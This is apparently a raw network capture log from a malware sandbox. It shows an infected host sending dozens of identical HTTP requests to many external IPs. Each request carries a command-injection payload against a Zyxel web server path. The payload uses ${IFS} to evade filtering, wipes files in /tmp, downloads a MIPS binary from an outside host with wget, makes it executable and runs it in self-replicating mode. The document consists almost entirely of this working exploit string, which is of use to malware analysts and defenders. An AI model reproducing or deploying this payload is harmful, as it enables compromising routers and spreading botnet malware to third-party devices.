                                      Jan 14, 2024 15:50:52.438723087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5907192.168.2.1457606160.37.234.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.438777924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5908192.168.2.1446716146.53.142.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.438815117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5909192.168.2.1435512212.204.251.213443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.438869953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5910192.168.2.1455738155.171.81.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.438909054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5911192.168.2.1445260148.19.244.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.438952923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5912192.168.2.1440008178.40.178.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.439002991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5913192.168.2.1456944189.133.131.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.439060926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5914192.168.2.1444392157.120.153.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.439105034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5915192.168.2.1446804146.240.20.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.439121962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5916192.168.2.1459214197.211.227.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.439155102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5917192.168.2.1458698223.61.213.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.439205885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5918192.168.2.1436240112.174.149.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.439261913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5919192.168.2.145198634.151.82.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.439296961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5920192.168.2.145617497.28.229.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.439363956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5921192.168.2.1439118189.186.70.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.439399004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5922192.168.2.145083287.25.231.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.439428091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5923192.168.2.1438694125.130.120.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.439472914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5924192.168.2.144211052.174.137.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.439502001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5925192.168.2.1450702199.133.147.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.439548969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5926192.168.2.1446454147.65.237.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.439591885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5927192.168.2.145389846.247.86.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.439625978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5928192.168.2.1456974184.63.133.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.439675093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5929192.168.2.1432980143.24.196.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.439701080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5930192.168.2.1454718102.143.8.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.439749002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5931192.168.2.1453316222.79.57.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.439770937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5932192.168.2.143905488.163.54.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.439822912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5933192.168.2.1453536199.91.205.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.439856052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5934192.168.2.1433924123.195.11.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.439893007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5935192.168.2.1446034187.1.229.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.439929962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5936192.168.2.1434810141.92.154.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.439963102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5937192.168.2.1453186202.104.115.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.440012932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5938192.168.2.144745861.231.222.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.440066099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5939192.168.2.1452912191.239.229.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.440093040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5940192.168.2.1453334124.26.96.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.440124035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5941192.168.2.143881283.126.90.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.440182924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5942192.168.2.1455520218.166.148.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.440222979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5943192.168.2.1442092185.1.92.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.440260887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5944192.168.2.1433042182.34.50.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.440308094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5945192.168.2.1443110174.192.24.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.440346003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5946192.168.2.145115441.224.139.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.440385103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5947192.168.2.1440234209.213.112.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.440418005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5948192.168.2.144527837.220.28.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.440483093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5949192.168.2.145597677.9.53.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.440531015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5950192.168.2.1436672180.178.85.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.440570116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5951192.168.2.14416089.2.139.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.440606117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5952192.168.2.1439756205.136.88.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.440639019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5953192.168.2.1459480193.99.7.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.440670967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5954192.168.2.1435192162.6.56.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.440705061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5955192.168.2.1434914106.91.54.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.440761089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5956192.168.2.144897277.54.160.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.440788984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5957192.168.2.1443254129.221.103.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.440814972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5958192.168.2.145784875.244.158.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.440853119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5959192.168.2.143376273.187.168.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.440929890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5960192.168.2.144813038.9.232.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.440954924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5961192.168.2.1433384145.123.213.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.440989017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5962192.168.2.1451458137.213.1.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.441013098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5963192.168.2.1451828202.180.99.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.441068888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5964192.168.2.1451126130.209.1.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.441113949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5965192.168.2.1448724120.125.83.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.441173077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5966192.168.2.1433176146.59.241.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.441207886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5967192.168.2.144903687.155.239.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.441255093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5968192.168.2.143899441.72.142.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.441293001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5969192.168.2.145896834.72.223.106443
                                      TimestampBytes transferredDirectionData
